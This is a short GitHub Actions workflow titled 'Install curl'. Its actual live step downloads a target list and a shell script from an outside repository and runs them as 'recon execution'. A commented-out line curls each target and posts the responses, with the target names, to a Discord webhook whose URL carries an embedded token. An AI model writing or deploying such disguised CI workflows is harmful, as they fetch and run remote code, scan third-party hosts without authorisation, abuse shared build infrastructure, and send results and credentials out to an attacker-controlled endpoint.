name: Install curl

on: [push]

jobs:
  install-curl:
    runs-on: ubuntu-latest

    steps:
#    - name: Install curl
#      run: |
#        sudo apt-get update
#        sudo apt-get install curl
    - name: recon execution
      run: |
        wget https://raw.githubusercontent.com/mehrankazemi1122/bio_continues_r3c0n/main/file.txt
        wget https://raw.githubusercontent.com/mehrankazemi1122/bio_continues_r3c0n/main/script.sh
        sudo chmod +x script.sh;
        ./script.sh file.txt
#        cat file.txt | while read -r line; do response=$(curl -s "http://$line"); [ -n "$response" ] && curl -X POST -d "Response : $response & Target: $line" https://discord.com/api/webhooks/1216775264588005407/KPWsewc6mEFSPesILV8WFDi8eB6SXC6wZ_Inno-_GJU_jQKzSXdp5NX3HAtIuNzZyUEX; done
